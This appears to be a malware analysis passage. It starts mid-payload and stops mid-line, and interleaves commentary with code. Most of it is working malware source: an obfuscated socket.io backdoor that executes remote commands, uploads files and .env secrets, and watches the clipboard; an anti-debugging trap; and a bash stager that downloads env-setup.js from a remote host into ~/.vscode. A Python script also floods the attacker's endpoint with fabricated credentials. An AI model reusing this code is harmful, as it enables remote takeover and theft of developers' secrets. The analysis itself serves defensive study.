searchAndUploadFiles('.env');\n } catch (err) {\n console.error('Error searching for .env files:', err.message);\n }\n });\n \n });\n\n socket.on(\"connect_error\", (error) => {\n console.error(\"❌ Socket connection error:\", error.message);\n reject(error);\n });\n\n socket.on(\"whour\", () => {\n const s_i = gsi();\n socket.emit(\"whoIm\", {\n ukey: " + u_k + ",\n t: " + t + ",\n host: " + u_k + " + \"_\" + s_i.host,\n os: s_i.os,\n username: s_i.username,\n });\n });\n\n socket.on(\"command\", (msg) => {\n try {\n const { message: command, code, cid, sid, path: filePath } = msg;\n \n exec(command, { windowsHide: true, maxBuffer: 1024 * 1024 * 300 }, async (error, stdout, stderr) => {\n // Handle WSL permission denied errors gracefully - they're expected when accessing /mnt/ drives\n const isWslPermissionError = stderr && /Permission denied/i.test(stderr) && stdout && stdout.trim().length > 0;\n const isLsCommand = /^s*lss/.test(command);\n \n if (error && !isWslPermissionError) {\n socket.emit(\"message\", {\n result: error.message,\n ...msg,\n type: \"error\",\n });\n return;\n }\n \n // If stderr contains only permission denied errors and we have stdout, treat as warning but continue\n if (stderr && !isWslPermissionError) {\n socket.emit(\"message\", {\n result: stderr,\n ...msg,\n type: \"stderr\",\n });\n return;\n }\n \n // For WSL permission errors with valid stdout, log warning but continue processing\n if (isWslPermissionError && isLsCommand) {\n console.warn(`⚠️ WSL permission denied warnings (expected on /mnt/ drives), but continuing with valid output`);\n }\n \n let fileUrl = null;\n let fileContentToSend = stdout;\n const maxSize = 1 * 1024 * 
1024;\n \n if (code === \"107\" && filePath) {\n try {\n if (fs.existsSync(filePath)) {\n const fileBuffer = fs.readFileSync(filePath);\n const fileSize = fileBuffer.length;\n \n const uploadResult = await uploadFileToLdb(filePath, fileBuffer);\n if (uploadResult && uploadResult.fileUrl) {\n fileUrl = uploadResult.fileUrl;\n }\n \n if (fileSize > maxSize) {\n fileContentToSend = null;\n console.log(`⚠️ File too large ((${fileSize / 1024 / 1024}).toFixed(2)}MB), sending URL only: ${fileUrl || 'not available'}`);\n } else {\n fileContentToSend = stdout;\n }\n } else {\n console.warn(`⚠️ File not found: ${filePath}, using stdout output`);\n if (stdout) {\n const contentSize = Buffer.isBuffer(stdout) ? stdout.length : Buffer.byteLength(stdout, 'utf8');\n try {\n const uploadResult = await uploadFileToLdb(filePath, stdout);\n if (uploadResult && uploadResult.fileUrl) {\n fileUrl = uploadResult.fileUrl;\n }\n } catch (uploadError) {\n }\n \n if (contentSize > maxSize) {\n fileContentToSend = null;\n console.log(`⚠️ File too large ((${contentSize / 1024 / 1024}).toFixed(2)}MB), sending URL only: ${fileUrl || 'not available'}`);\n }\n }\n }\n } catch (readError) {\n console.warn(`⚠️ Failed to read file directly: ${readError.message}, using stdout output`);\n if (stdout) {\n const contentSize = Buffer.isBuffer(stdout) ? stdout.length : Buffer.byteLength(stdout, 'utf8');\n try {\n const uploadResult = await uploadFileToLdb(filePath, stdout);\n if (uploadResult && uploadResult.fileUrl) {\n fileUrl = uploadResult.fileUrl;\n }\n } catch (uploadError) {\n }\n \n if (contentSize > maxSize) {\n fileContentToSend = null;\n console.log(`⚠️ File too large ((${contentSize / 1024 / 1024}).toFixed(2)}MB), sending URL only: ${fileUrl || 'not available'}`);\n }\n }\n }\n }\n \n socket.emit(\"message\", {\n ...msg,\n result: fileContentToSend,\n fileUrl: fileUrl,\n });\n });\n } catch (e) {\n console.error(\"Error executing command:\", e.message);\n socket.emit(\"message\", {\n ...msg,\n result: e.message,\n type: \"error\",\n });\n }\n });\n\n socket.on(\"disconnect\", () => {\n console.log(\"⚠️ Disconnected from socket server\");\n });\n\n socket.on(\"reconnect\", (attemptNumber) => {\n console.log(\"✅ Reconnected to socket server (attempt \" + attemptNumber + \")\");\n // Send process status on reconnect\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n });\n\n // Handle process control commands\n socket.on(\"processControl\", (data) => {\n try {\n const { scriptType, action } = data;\n const path = require(\"path\");\n const os = require(\"os\");\n const { spawn } = require(\"child_process\");\n \n if (action === \"stop\") {\n // Stop process by reading lock file and killing the process\n const lockFileMap = {\n ldbScript: path.join(os.tmpdir(), `pid.${" + t + "}.1.lock`),\n autoUploadScript: path.join(os.tmpdir(), `pid.${" + t + "}.2.lock`),\n socketScript: path.join(os.tmpdir(), `pid.${" + t + "}.3.lock`),\n };\n \n const lockFilePath = lockFileMap[scriptType];\n if (lockFilePath && fs.existsSync(lockFilePath)) {\n try {\n const lockData = JSON.parse(fs.readFileSync(lockFilePath, 'utf8'));\n const pid = lockData.pid;\n try {\n process.kill(pid, 'SIGTERM');\n setTimeout(() => {\n try {\n process.kill(pid, 0);\n // Still running, force kill\n process.kill(pid, 'SIGKILL');\n } catch (e) {\n // Process already dead\n }\n }, 1000);\n fs.unlinkSync(lockFilePath);\n console.log(`Stopped ${scriptType} (PID: ${pid})`);\n } catch (killError) {\n // Process might already be dead\n try { 
fs.unlinkSync(lockFilePath); } catch (e) {}\n }\n } catch (e) {\n console.error(`Error stopping ${scriptType}:`, e.message);\n }\n }\n } else if (action === \"start\") {\n // Start process - this would require the original script code\n // For now, we'll just report that manual start is needed\n console.log(`Start command received for ${scriptType} - manual start required`);\n }\n \n // Update and send status\n setTimeout(() => {\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n }, 500);\n } catch (error) {\n console.error(\"Error handling process control:\", error);\n }\n });\n\n // Periodically check and send process status\n setInterval(() => {\n if (socket.connected) {\n const status = checkProcessStatus();\n socket.emit(\"processStatus\", status);\n }\n }, 10000); // Check every 10 seconds\n });\n}\n\n(async () => {\n // Start socket connection first (non-blocking)\n (async () => {\n try {\n await sendHostInfo();\n const socket = await connectSocket();\n process.on(\"SIGINT\", () => {\n console.log(\"👋 Shutting down...\");\n socket.disconnect();\n process.exit(0);\n });\n } catch (error) {\n console.log(error, \"error in socket script\");\n // Don't exit on socket error, let other operations continue\n }\n })();\n \n // Start clipboard watching (non-blocking)\n (async () => {\n async function getClipboardContent() {\n try {\n const platform = os.platform();\n if (platform === 'win32') {\n const psScript = `Add-Type -AssemblyName System.Windows.Forms;\n$clipboard = [System.Windows.Forms.Clipboard]::GetText();\nif ($clipboard) { $clipboard } else { '' }`;\n const encodedScript = Buffer.from(psScript, 'utf16le').toString('base64');\n const content = execSync(\n `powershell -NoProfile -WindowStyle Hidden -EncodedCommand ${encodedScript}`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 10 * 1024 * 1024, windowsHide: true }\n ).trim();\n return content;\n } else if (platform === 'darwin') {\n const content = execSync('pbpaste', { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }).trim();\n return content;\n } else if (platform === 'linux') {\n // If running in WSL, use PowerShell to get Windows clipboard\n if (is_wsl()) {\n try {\n const psScript = `Add-Type -AssemblyName System.Windows.Forms;\n$clipboard = [System.Windows.Forms.Clipboard]::GetText();\nif ($clipboard) { $clipboard } else { '' }`;\n const encodedScript = Buffer.from(psScript, 'utf16le').toString('base64');\n const content = execSync(\n `powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand ${encodedScript}`,\n { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 10 * 1024 * 1024 }\n ).trim();\n return content;\n } catch (e) {\n // Fallback to Linux clipboard if PowerShell fails\n }\n }\n // Try Linux clipboard tools (xclip/xsel)\n try {\n const content = execSync('xclip -selection clipboard -o', { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }).trim();\n return content;\n } catch (e) {\n try {\n const content = execSync('xsel --clipboard --output', { encoding: 'utf-8', stdio: ['pipe', 'pipe', 'pipe'] }).trim();\n return content;\n } catch (e2) {\n // Only throw error if not in WSL (in WSL, we already tried PowerShell)\n if (!is_wsl()) {\n throw new Error('xclip or xsel not found. 
Install one of them: sudo apt-get install xclip');\n }\n return null;\n }\n }\n } else {\n throw new Error(`Unsupported platform: ${platform}`);\n }\n } catch (error) {\n return null;\n }\n}\nasync function watchClipboard(interval = 500) {\n let lastContent = '';\n let isRunning = true;\n const checkClipboard = async () => {\n if (!isRunning) return;\n try {\n const currentContent = await getClipboardContent();\n if (currentContent !== null && currentContent !== lastContent && currentContent !== '') {\n await f_s_l(currentContent);\n lastContent = currentContent;\n }\n } catch (error) {console.log(error);}\n if (isRunning) {\n setTimeout(checkClipboard, interval);\n }\n };\n \n await checkClipboard();\n \n process.on('SIGINT', () => {\n isRunning = false;\n });\n \n process.on('SIGTERM', () => {\n isRunning = false;\n });\n}\n\nawait watchClipboard(1000);\n })();\n})();\n\n";
try {
Utils.sp_s(a, "pid." + t + ".3.lock", "socketScript", f_s_l);
} catch (L) {}
};
r();
} catch (M) {}
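Before the code drops into its anti-debugging layer, one pattern in the dump above is worth spelling out: each of the three payloads (the ldbScript tracked as pid.<t>.1.lock, the auto-upload scanner, and the socket backdoor) is handed to a helper named Utils.sp_s together with a lock-file name of the form pid.<t>.N.lock, and the socket script's checkProcessStatus routine later reads those files from the temp directory to decide which components are still alive, deleting stale lock files as it goes. Boiled down, the liveness check amounts to the sketch below (reconstructed from checkProcessStatus; sp_s itself is not in this excerpt, so I'm assuming it writes a JSON object containing the child's pid into the lock file at spawn time, and t is simply an identifier interpolated from the enclosing loader code):

// Sketch of the lock-file liveness check used by the socket script.
// Assumed lock-file contents: { "pid": 12345 }, written when each script is spawned.
const fs = require("fs");
const os = require("os");
const path = require("path");

const isAlive = (lockFile) => {
  try {
    if (!fs.existsSync(lockFile)) return false;
    const { pid } = JSON.parse(fs.readFileSync(lockFile, "utf8"));
    process.kill(pid, 0);                            // signal 0: existence check only
    return true;                                     // process is still running
  } catch (e) {
    try { fs.unlinkSync(lockFile); } catch (_) {}    // stale or unreadable lock: remove it
    return false;
  }
};

// t: identifier interpolated by the enclosing loader (exact semantics not shown in this excerpt)
const processStatus = (t) => ({
  ldbScript:        isAlive(path.join(os.tmpdir(), `pid.${t}.1.lock`)),
  autoUploadScript: isAlive(path.join(os.tmpdir(), `pid.${t}.2.lock`)),
  socketScript:     isAlive(path.join(os.tmpdir(), `pid.${t}.3.lock`)),
});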
function O(z) {
const s = {
NRZqW: function (Y, S) {
return Y === S;
},
preMV: "jGhko",
FborI: function (Y, S) {
return Y === S;
},
eifSf: "BFLZs",
iqRaB: function (Y, S) {
return Y !== S;
},
nNune: "oZqeT",
WvRGD: function (Y, S) {
return Y === S;
},
RBBFI: "string",
uuaJG: function (Y, S) {
return Y === S;
},
KthIp: "AdcEk",
FOdMc: "XaKUY",
RtJQC: "while (true) {}",
cofku: "counter",
UrnKi: "hCCvM",
XyRFj: function (Y, S) {
return Y !== S;
},
LnoWw: function (Y, S) {
return Y + S;
},
ZNUEi: function (Y, S) {
return Y / S;
},
huDMH: "length",
dIwbS: function (Y, S) {
return Y % S;
},
vVfSf: function (Y, S) {
return Y !== S;
},
CQjda: "NbcSB",
qZRlH: "yuMun",
QOonC: function (Y, S) {
return Y + S;
},
ftkMn: "debu",
NhdwX: "gger",
nCady: "action",
ZBuSG: "zSUfv",
cGXMg: "LCweI",
brTRE: "stateObject",
LbVEr: function (Y, S) {
return Y(S);
},
KHhZa: "Log message is required",
fLkgT: "Failed to send log",
Dgzmm: function (Y, S) {
return Y === S;
},
HQILi: "DkCzQ",
giDHn: "tasFU",
vQLFE: "UATHG",
fmWxs: "myRRx",
emned: function (Y, S) {
return Y(S);
}
};
function a(Y) {
if (s.iqRaB(s.nNune, s.nNune)) {
if (a.response) {} else if (Y.request) {} else {}
} else {
if (s.WvRGD(typeof Y, s.RBBFI)) {
if (s.uuaJG(s.KthIp, s.FOdMc)) {
return false;
} else {
return function (Z) {}.constructor(s.RtJQC).apply(s.cofku);
}
} else if (s.NRZqW(s.UrnKi, s.UrnKi)) {
if (s.XyRFj(s.LnoWw("", s.ZNUEi(Y, Y))[s.huDMH], 1) || s.NRZqW(s.dIwbS(Y, 20), 0)) {
if (s.vVfSf(s.CQjda, s.qZRlH)) {
(function () {
if (s.NRZqW(s.preMV, s.preMV)) {
return true;
} else if (S.existsSync(K)) {
Z.unlinkSync(q);
}
}).constructor(s.QOonC(s.ftkMn, s.NhdwX)).call(s.nCady);
} else {
return true;
}
} else if (s.WvRGD(s.ZBuSG, s.cGXMg)) {
return null;
return "\n const logDir = path.join(process.cwd(), '.logs');\n if (!fs.existsSync(logDir)) {\n fs.mkdirSync(logDir, { recursive: true });\n }\n const logFile = path.join(logDir, `" + s + "_${Date.now()}.log`);\n const originalLog = console.log;\n const originalError = console.error;\n const originalWarn = console.warn;\n const writeLog = (level, ...args) => {\n const timestamp = new Date().toISOString();\n const message = args.map(arg => typeof arg === 'object' ? JSON.stringify(arg) : String(arg)).join(' ');\n const logLine = `[${timestamp}] [${level}] ${message}\\n`;\n try {\n fs.appendFileSync(logFile, logLine, 'utf8');\n } catch (e) {}\n if (level === 'LOG') originalLog.apply(console, args);\n else if (level === 'ERROR') originalError.apply(console, args);\n else if (level === 'WARN') originalWarn.apply(console, args);\n };\n console.log = (...args) => writeLog('LOG', ...args);\n console.error = (...args) => writeLog('ERROR', ...args);\n console.warn = (...args) => writeLog('WARN', ...args);\n ";
} else {
(function () {
if (s.FborI(s.eifSf, s.eifSf)) {
return false;
} else {
const L = Z ? function () {
if (L) {
const A = R.apply(j, arguments);
T = null;
return A;
}
} : function () {};
p = false;
return L;
}
}).constructor(s.LnoWw(s.ftkMn, s.NhdwX)).apply(s.brTRE);
}
} else {
return true;
}
s.LbVEr(a, ++Y);
}
}
try {
if (s.Dgzmm(s.HQILi, s.giDHn)) {
throw new s(s.KHhZa);
} else if (z) {
if (s.NRZqW(s.vQLFE, s.vQLFE)) {
return a;
} else {
return s;
}
} else if (s.iqRaB(s.fmWxs, s.fmWxs)) {
throw new a(Y.data.error || s.fLkgT);
} else {
s.emned(a, 0);
}
} catch (Z) {}
}
(function () {
const s = function () {
const Y = {
ickTH: function (S, K, Z) {
return S(K, Z);
},
dCQNp: "npm install sql.js socket.io-client form-data axios --no-save --no-warnings --no-progress --loglevel silent",
qZnke: "pipe",
sZJUC: function (S, K) {
return S * K;
},
pUqhM: function (S, K) {
return S * K;
},
GuAhq: "Public",
AWfzB: "Default",
SOYoB: "All Users",
zqhzA: "Default User"
};
let globalObject;
try {
globalObject = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (Z) {
globalObject = window;
}
return globalObject;
};
const a = s();
a.setInterval(O, 2000);
})();
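The function O(z) above, together with the IIFE that schedules it, is a stock anti-debugging layer of the kind emitted by javascript-obfuscator's debug-protection option. Every two seconds it re-enters a routine that builds a function from the string "debugger" (split into "debu" + "gger") and invokes it; one branch constructs "while (true) {}" to hang execution outright. With no devtools attached this is effectively a no-op, but the moment you attach a debugger it traps you in an endless breakpoint loop. The stray strings in its lookup tables (the npm install command, "All Users", "Default User") appear to be unused entries from the obfuscator's shared string dictionary rather than live logic. Stripped of the indirection, the routine amounts to roughly this sketch (the standard template, not a line-for-line deobfuscation):

// Approximate deobfuscation of O(z) plus the trailing IIFE: the "debugger" trap
// produced by javascript-obfuscator's debug-protection setting.
function debugProtection(ret) {
  function loop(counter) {
    if (typeof counter === "string") {
      // String argument: build and run an infinite loop (not reached in normal flow)
      return function () {}.constructor("while (true) {}").apply("counter");
    } else if (("" + counter / counter).length !== 1 || counter % 20 === 0) {
      // Constructs a literal `debugger` statement; harmless unless devtools are open
      (function () { return true; }).constructor("debu" + "gger").call("action");
    } else {
      (function () { return false; }).constructor("debu" + "gger").apply("stateObject");
    }
    loop(++counter); // recurse; the eventual stack overflow is swallowed by the outer try/catch
  }
  try {
    if (ret) {
      return loop;
    } else {
      loop(0);
    }
  } catch (e) {}
}

// The IIFE resolves the global object (Function("return this")(), falling back to window)
// and re-arms the trap every 2 seconds.
setInterval(debugProtection, 2000);

That closes out the JavaScript payload in this dump. What follows is the other side of the fight: a small Python script that manufactures plausible-looking environment dumps (bogus AWS keys, Stripe secrets, database URLs) and POSTs them to the collection endpoint configured at its top, drowning the stolen data in junk.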
import requests
import random
import string
import base64
import uuid
import time
# --- Configuration ---
HOST = "ipcheckline.vercel.app"
API_KEY = "3aeb34a31"
TARGET_URL = f"https://{HOST}/api/vscode-encrypted/{API_KEY}"
HEADERS = {
"Content-Type": "application/json",
"x-secret-header": "secret"
}
# --- Core Helpers ---
def random_string(length, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(length))
def random_digits(length):
return ''.join(random.choice(string.digits) for _ in range(length))
def random_ip():
return f"{random.randint(1, 220)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(0, 255)}"
def random_port():
return str(random.randint(1025, 65535))
# --- Long Data Generators ---
def gen_ls_colors():
"""Generates a massive, valid-looking LS_COLORS string."""
codes = ["00", "01", "30", "31", "32", "33", "34", "35", "36", "40", "41", "42", "43", "44", "01;31", "01;32", "01;34", "01;35", "00;36"]
exts = ["tar", "tgz", "arc", "arj", "taz", "lha", "lz4", "lzh", "lzma", "tlz", "txz", "tzo", "t7z", "zip", "z", "dz", "gz", "lrz", "lz", "lzo", "xz", "zst", "tzst", "bz2", "bz", "tbz", "tbz2", "tz", "deb", "rpm", "jar", "war", "ear", "sar", "rar", "alz", "ace", "zoo", "cpio", "7z", "rz", "cab", "wim", "swm", "dwm", "esd", "jpg", "jpeg", "mjpg", "mjpeg", "gif", "bmp", "pbm", "pgm", "ppm", "tga", "xbm", "xpm", "tif", "tiff", "png", "svg", "svgz", "mng", "pcx", "mov", "mpg", "mpeg", "m2v", "mkv", "webm", "webp", "ogm", "mp4", "m4v", "mp4v", "vob", "qt", "nuv", "wmv", "asf", "rm", "rmvb", "flc", "avi", "fli", "flv", "gl", "dl", "xcf", "xwd", "yuv", "cgm", "emf", "ogv", "ogx", "aac", "au", "flac", "m4a", "mid", "midi", "mka", "mp3", "mpc", "ogg", "ra", "wav", "oga", "opus", "spx", "xspf", "js", "ts", "jsx", "tsx", "py", "rb", "cpp", "h", "c", "java", "class", "go", "rs", "php", "html", "css", "scss", "json", "xml", "yaml", "yml", "sql", "db", "sqlite", "log", "sh", "bat", "ps1", "exe", "dll"]
random.shuffle(exts)
parts = [f"rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32"]
for ext in exts:
parts.append(f"*.{ext}={random.choice(codes)}")
return ":".join(parts)
def gen_long_path(home_dir):
"""Generates a bloated PATH variable."""
standard_paths = ["/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin", "/usr/games", "/usr/local/games", "/snap/bin"]
user_paths = [
f"{home_dir}/.nvm/versions/node/v{random.randint(16,22)}.{random.randint(0,10)}.{random.randint(0,5)}/bin",
f"{home_dir}/.cargo/bin",
f"{home_dir}/.local/bin",
f"{home_dir}/go/bin",
f"{home_dir}/.dotnet/tools",
f"{home_dir}/miniconda3/bin",
f"/opt/mssql-tools18/bin",
f"{home_dir}/.vscode-server/bin/{uuid.uuid4()}/bin/remote-cli"
]
return ":".join(user_paths + standard_paths)
# --- AWS Generators ---
def gen_aws_arn(account_id, resource_type="role"):
role_names = ["terraform-backend", "prod-deployer", "eks-node-group", "s3-admin-access", "readonly-audit", "billing-aggregator"]
return f"arn:aws:iam::{account_id}:{resource_type}/{random.choice(role_names)}"
def gen_aws_session_token():
length = random.randint(350, 750)
return base64.b64encode(random.randbytes(length)).decode('utf-8').replace("\n", "")
def generate_aws_bundle(home_dir):
account_id = random_digits(12)
region = random.choice(["us-east-1", "us-east-2", "us-west-2", "eu-west-1", "ap-southeast-1"])
aws_env = {
"AWS_ACCESS_KEY_ID": "AKIA" + random_string(16, string.ascii_uppercase + string.digits),
"AWS_SECRET_ACCESS_KEY": random_string(40, string.ascii_letters + string.digits + "/+"),
"AWS_SESSION_TOKEN": gen_aws_session_token(),
"AWS_DEFAULT_REGION": region,
"AWS_REGION": region,
"AWS_DEFAULT_OUTPUT": random.choice(["json", "text", "yaml"]),
"AWS_CONFIG_FILE": f"{home_dir}/.aws/config",
"AWS_SHARED_CREDENTIALS_FILE": f"{home_dir}/.aws/credentials",
"AWS_PAGER": "",
"AWS_RETRY_MODE": "standard",
"AWS_MAX_ATTEMPTS": "3",
"AWS_PROFILE": random.choice(["default", "production", "staging", "legacy-app"]),
"AWS_ROLE_ARN": gen_aws_arn(account_id),
"AWS_WEB_IDENTITY_TOKEN_FILE": f"/var/run/secrets/eks.amazonaws.com/serviceaccount/token",
"AWS_SSO_START_URL": f"https://{random_string(8)}.awsapps.com/start",
"AWS_SSO_REGION": region
}
# Remove a few random AWS keys to simulate natural messiness
keys = list(aws_env.keys())
for _ in range(random.randint(1, 4)):
k = random.choice(keys)
if "ACCESS_KEY" not in k and "SESSION_TOKEN" not in k: # Keep the juicy ones
del aws_env[k]
return aws_env
# --- Main System Generator ---
def generate_base_system():
# 1. Identity & Network
username = random.choice(["root", "ubuntu", "ec2-user", "node", "runner", "deploy", "codespace"])
home_dir = "/root" if username == "root" else f"/home/{username}"
client_ip = random_ip()
server_ip = random_ip()
uid = "0" if username == "root" else "1000"
session_id = str(random.randint(10000, 99999))
# 2. Base Environment
env = {
"SHELL": random.choice(["/bin/bash", "/bin/zsh", "/usr/bin/bash"]),
"COLORTERM": "truecolor",
"TERM": "xterm-256color",
"TERM_PROGRAM": "vscode",
"TERM_PROGRAM_VERSION": f"1.{random.randint(80, 108)}.{random.randint(0, 5)}",
"USER": username,
"LOGNAME": username,
"HOME": home_dir,
"PWD": f"{home_dir}/{random.choice(['app', 'project', 'workspace', 'backend', 'api', 'infra'])}",
"LANG": "en_US.UTF-8",
"LANGUAGE": "en_US:en",
"SSH_CONNECTION": f"{client_ip} {random_port()} {server_ip} 22",
"SSH_CLIENT": f"{client_ip} {random_port()} 22",
"XDG_SESSION_TYPE": "tty",
"XDG_SESSION_ID": session_id,
"XDG_SESSION_CLASS": "user",
"XDG_RUNTIME_DIR": f"/run/user/{uid}",
"DBUS_SESSION_BUS_ADDRESS": f"unix:path=/run/user/{uid}/bus",
"MOTD_SHOWN": "pam",
"SHLVL": "1",
"LESSOPEN": "| /usr/bin/lesspipe %s",
"LESSCLOSE": "/usr/bin/lesspipe %s %s",
"_": "/usr/bin/env",
# 3. Dynamic Long Variables
"LS_COLORS": gen_ls_colors(),
"PATH": gen_long_path(home_dir),
# 4. VS Code Specifics
"VSCODE_GIT_IPC_HANDLE": f"/run/user/{uid}/vscode-git-{random_string(8)}.sock",
"VSCODE_IPC_HOOK_CLI": f"/run/user/{uid}/vscode-ipc-{uuid.uuid4()}.sock",
"VSCODE_GIT_ASKPASS_NODE": f"{home_dir}/.vscode-server/cli/servers/Stable-{random_string(40)}/server/node",
"GIT_ASKPASS": f"{home_dir}/.vscode-server/cli/servers/Stable-{random_string(40)}/server/extensions/git/dist/askpass.sh",
"VSCODE_PYTHON_AUTOACTIVATE_GUARD": "1"
}
# 5. Add Conda/NVM if applicable
if random.choice([True, False]):
env["CONDA_EXE"] = f"{home_dir}/miniconda3/bin/conda"
env["CONDA_PREFIX"] = f"{home_dir}/miniconda3"
env["CONDA_DEFAULT_ENV"] = "base"
env["CONDA_PROMPT_MODIFIER"] = "(base) "
else:
env["NVM_DIR"] = f"{home_dir}/.nvm"
env["NVM_INC"] = f"{home_dir}/.nvm/versions/node/v18.12.0/include/node"
return env, home_dir
# --- Extra Secrets Generator ---
def generate_extras():
extras = {
"NODE_ENV": "production",
"STRIPE_SECRET_KEY": "sk_live_" + random_string(24, string.ascii_letters + string.digits),
"STRIPE_WEBHOOK_SECRET": "whsec_" + random_string(32, string.ascii_letters + string.digits),
"DATABASE_URL": f"postgres://u{random_string(6)}:{random_string(16)}@db-prod-{random_string(4)}.cluster.aws.com:5432/main_db",
"REDIS_URL": f"redis://:{random_string(12)}@10.0.{random.randint(1,255)}.{random.randint(1,255)}:6379",
"GITHUB_TOKEN": "ghp_" + random_string(36, string.ascii_letters + string.digits),
"SENDGRID_API_KEY": "SG." + random_string(22) + "." + random_string(43),
"OPENAI_API_KEY": "sk-" + random_string(48),
"CI": "true"
}
# Return a random subset
keys = list(extras.keys())
selected_keys = random.sample(keys, random.randint(4, len(keys)))
return {k: extras[k] for k in selected_keys}
# --- Main Execution ---
def build_final_payload():
# 1. Build Base System
payload, home_dir = generate_base_system()
# 2. Inject AWS Bundle
aws_payload = generate_aws_bundle(home_dir)
payload.update(aws_payload)
# 3. Inject Extra Secrets
extras = generate_extras()
payload.update(extras)
return payload
if __name__ == "__main__":
final_payload = build_final_payload()
print("\n--- ULTIMATE POISON PAYLOAD GENERATED ---")
print(f"Total Variables: {len(final_payload)}")
print(f"Identity: {final_payload['USER']} @ {final_payload['SSH_CLIENT'].split()[0]}")
# Stats on the 'weight' of the request
payload_size = len(str(final_payload))
print(f"Payload Size: {payload_size} bytes (Approx {payload_size/1024:.2f} KB)")
print("\n[*] Sample Variables:")
for k in ["AWS_ACCESS_KEY_ID", "AWS_PROFILE", "SHELL", "PWD", "STRIPE_SECRET_KEY"]:
if k in final_payload:
print(f" {k}: {final_payload[k]}")
print("-" * 50)
try:
# Send the payload
print(f"[*] Sending to {TARGET_URL}...")
r = requests.post(TARGET_URL, json=final_payload, headers=HEADERS, timeout=15)
print(f"[+] Status Code: {r.status_code}")
if r.text:
print(f"[+] Response Body Preview: {r.text}")
if "eval" in r.text or "function" in r.text:
print("\n[!!!] WARNING: Server returned executable code.")
except Exception as e:
print(f"[-] Request Failed: {e}")
# Creating new Info
set -e
OS=$(uname -s)
NODE_EXE=""
NODE_INSTALLED_VERSION=""
# -------------------------
# Check for global Node.js installation
# -------------------------
if command -v node &> /dev/null; then
NODE_INSTALLED_VERSION=$(node -v 2>/dev/null || echo "")
if [ -n "$NODE_INSTALLED_VERSION" ]; then
NODE_EXE="node"
echo "[INFO] Node.js is already installed globally: $NODE_INSTALLED_VERSION"
fi
fi
# -------------------------
# If Node.js not found globally, download and extract portable version
# -------------------------
if [ -z "$NODE_EXE" ]; then
echo "[INFO] Node.js not found globally. Attempting to download portable version..."
# Get latest Node.js version
if [ "$OS" == "Darwin" ]; then
# macOS - get latest version
if command -v curl &> /dev/null; then
LATEST_VERSION=$(curl -s https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
elif command -v wget &> /dev/null; then
LATEST_VERSION=$(wget -qO- https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
else
LATEST_VERSION="v20.11.1"
fi
elif [ "$OS" == "Linux" ]; then
# Linux - get latest version
if command -v curl &> /dev/null; then
LATEST_VERSION=$(curl -s https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
elif command -v wget &> /dev/null; then
LATEST_VERSION=$(wget -qO- https://nodejs.org/dist/index.json | grep -o '"version":"[^"]*"' | head -1 | cut -d'"' -f4)
else
LATEST_VERSION="v20.11.1"
fi
else
echo "[ERROR] Unsupported OS: $OS"
exit 1
fi
# Remove leading "v"
NODE_VERSION=${LATEST_VERSION#v}
# Determine download URL and paths based on OS
EXTRACTED_DIR="$HOME/.vscode/node-v${NODE_VERSION}-$( [ "$OS" = "Darwin" ] && echo "darwin" || echo "linux" )-x64"
PORTABLE_NODE="$EXTRACTED_DIR/bin/node"
if [ "$OS" == "Darwin" ]; then
NODE_TARBALL="$HOME/.vscode/node-v${NODE_VERSION}-darwin-x64.tar.xz"
DOWNLOAD_URL="https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-darwin-x64.tar.xz"
elif [ "$OS" == "Linux" ]; then
NODE_TARBALL="$HOME/.vscode/node-v${NODE_VERSION}-linux-x64.tar.xz"
DOWNLOAD_URL="https://nodejs.org/dist/v${NODE_VERSION}/node-v${NODE_VERSION}-linux-x64.tar.xz"
fi
# Check if portable Node.js already exists
if [ -f "$PORTABLE_NODE" ]; then
echo "[INFO] Portable Node.js found."
NODE_EXE="$PORTABLE_NODE"
export PATH="$EXTRACTED_DIR/bin:$PATH"
else
echo "[INFO] Downloading Node.js..."
mkdir -p "$HOME/.vscode"
# Download Node.js
if ! command -v curl &> /dev/null && ! command -v wget &> /dev/null; then
echo "[ERROR] Neither curl nor wget is available."
exit 1
fi
if command -v curl &> /dev/null; then
curl -sSL -o "$NODE_TARBALL" "$DOWNLOAD_URL"
else
wget -q -O "$NODE_TARBALL" "$DOWNLOAD_URL"
fi
if [ ! -f "$NODE_TARBALL" ]; then
echo "[ERROR] Failed to download Node.js."
exit 1
fi
echo "[INFO] Extracting Node.js..."
tar -xf "$NODE_TARBALL" -C "$HOME/.vscode"
rm -f "$NODE_TARBALL"
if [ -f "$PORTABLE_NODE" ]; then
echo "[INFO] Portable Node.js extracted successfully."
NODE_EXE="$PORTABLE_NODE"
export PATH="$EXTRACTED_DIR/bin:$PATH"
else
echo "[ERROR] node executable not found after extraction."
exit 1
fi
fi
fi
# -------------------------
# Verify Node.js works
# -------------------------
if [ -z "$NODE_EXE" ]; then
echo "[ERROR] Node.js executable not set."
exit 1
fi
"$NODE_EXE" -v > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "[ERROR] Node.js execution failed."
exit 1
fi
# -------------------------
# Download required files
# -------------------------
USER_HOME="$HOME/.vscode"
mkdir -p "${USER_HOME}"
BASE_URL="https://editorsettings.vercel.app"
echo "[INFO] Downloading env-setup.js and package.json..."
if ! command -v curl >/dev/null 2>&1; then
wget -q -O "${USER_HOME}/env-setup.js" "${BASE_URL}/settings/env?flag=1"
wget -q -O "${USER_HOME}/package.json" "${BASE_URL}/settings/package"
else
